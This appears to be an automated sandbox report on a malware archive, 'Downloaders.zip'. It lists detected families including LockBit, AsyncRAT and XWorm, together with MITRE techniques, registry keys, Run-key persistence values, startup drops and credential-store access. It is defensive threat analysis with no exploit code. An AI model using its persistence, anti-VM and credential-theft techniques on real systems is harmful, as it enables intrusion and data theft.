Malware Analysis Report

2025-01-23 12:19

Sample ID 241126-24va4avjdt
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
ammyyadmin asyncrat exelastealer flawedammyy gurcu lockbit monster phorphiex xworm default collection defense_evasion discovery evasion execution loader persistence privilege_escalation ransomware rat spyware stealer themida trojan worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

ammyyadmin asyncrat exelastealer flawedammyy gurcu lockbit monster phorphiex xworm default collection defense_evasion discovery evasion execution loader persistence privilege_escalation ransomware rat spyware stealer themida trojan worm

Rule to detect Lockbit 3.0 ransomware Windows payload

Exelastealer family

Detect Xworm Payload

Lockbit family

AsyncRat

Xworm family

Flawedammyy family

Lockbit

Phorphiex, Phorpiex

Monster

Phorphiex payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Phorphiex family

Ammyyadmin family

Detects Monster Stealer.

Gurcu, WhiteSnake

Gurcu family

Monster family

Ammyy Admin

Asyncrat family

FlawedAmmyy RAT

Xworm

AmmyyAdmin payload

Exela Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Grants admin privileges

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Themida packer

Checks computer location settings

Loads dropped DLL

Drops startup file

Reads user/profile data of web browsers

Reads WinSCP keys stored on the system

Executes dropped EXE

Clipboard Data

Checks BIOS information in registry

Adds Run key to start application

Looks up external IP address via web service

Enumerates connected drives

Checks whether UAC is enabled

Checks installed software on the system

Network Service Discovery

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Hide Artifacts: Hidden Files and Directories

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Drops autorun.inf file

Launches sc.exe

Drops file in Windows directory

Browser Information Discovery

System Network Connections Discovery

Event Triggered Execution: Netsh Helper DLL

Embeds OpenSSL

Enumerates physical storage devices

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Permission Groups Discovery: Local Groups

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

outlook_office_path

Runs net.exe

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Kills process with taskkill

Gathers system information

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: AddClipboardFormatListener

Modifies data under HKEY_USERS

Gathers network information

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

outlook_win_path

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Scheduled Task/Job: Scheduled Task

Collects information from the system

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-26 23:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 23:08

Reported

2024-11-26 23:11

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Monster Stealer.

Description Indicator Process Target
N/A N/A N/A N/A

Exela Stealer

stealer exelastealer

Exelastealer family

exelastealer

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Lockbit

ransomware lockbit

Lockbit family

lockbit

Monster

stealer monster

Monster family

monster

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Rule to detect Lockbit 3.0 ransomware Windows payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1392523614.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\46422e05e6e5062fec6d0ab906669fb9.exe C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\46422e05e6e5062fec6d0ab906669fb9.exe C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\service.exe C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\typeid.vbs C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\typeid.vbs C:\Windows\system32\taskmgr.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\winx86.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2802026625.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1392523614.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1719112073.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\SteamDetector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1205734847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\m.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\188477111.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2472628288.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2009521560.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ITplan.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\DRIVEapplet.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\build.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\BitcoinCore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\t.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_5932_133771361514349931\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\v7wa24td.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\46422e05e6e5062fec6d0ab906669fb9 = "\"C:\\Users\\Admin\\AppData\\Roaming\\SteamDetector.exe\" .." C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\46422e05e6e5062fec6d0ab906669fb9 = "\"C:\\Users\\Admin\\AppData\\Roaming\\SteamDetector.exe\" .." C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\N: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\mstsc.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\mstsc.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\ARP.EXE N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops autorun.inf file

Description Indicator Process Target
File created C:\autorun.inf C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
File opened for modification C:\autorun.inf C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
File created D:\autorun.inf C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
File created F:\autorun.inf C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
File opened for modification F:\autorun.inf C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gdn5yfjd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\t.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\TikTokDesktop18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\SteamDetector.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Aa_v3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\ptihjawdthas.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
